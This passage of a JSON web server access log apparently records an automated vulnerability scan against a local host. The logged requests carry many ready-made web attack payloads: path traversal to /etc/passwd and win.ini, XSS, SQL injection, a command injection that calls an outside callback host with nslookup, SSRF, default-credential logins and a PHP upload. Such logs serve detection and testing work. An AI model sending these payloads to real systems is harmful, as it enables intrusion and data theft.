AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/23 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://c9oms3gsmpve1ijt0mc0uxooeasdtzm5z.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/script?command=|%20nslookup%20c9oms3gsmpve1ijt0mc0bs5spqrwd7w18.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.255","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /app/kibana HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.827","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user.php?act=login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:72:\x220,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\x22;s:2:\x22id\x22;i:1;}", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.439","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.349","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /perl-status HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.455","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.713","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.721","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.275","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.901","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"------WebKitFormBoundaryfcKRltGv\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.php\x22\x0D\x0AContent-Type: image/avif\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryfcKRltGv--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /Upload/upload_file.php?l=test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/24 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.885","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /help/english/index.html?javascript& HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.015","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.956","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/api/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.258","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.057","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.261","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Upload/test/test.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.247","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.249","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.347","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.242","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.243","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.251","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.486","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/25 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.242","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hsqldb%0a HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.331","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 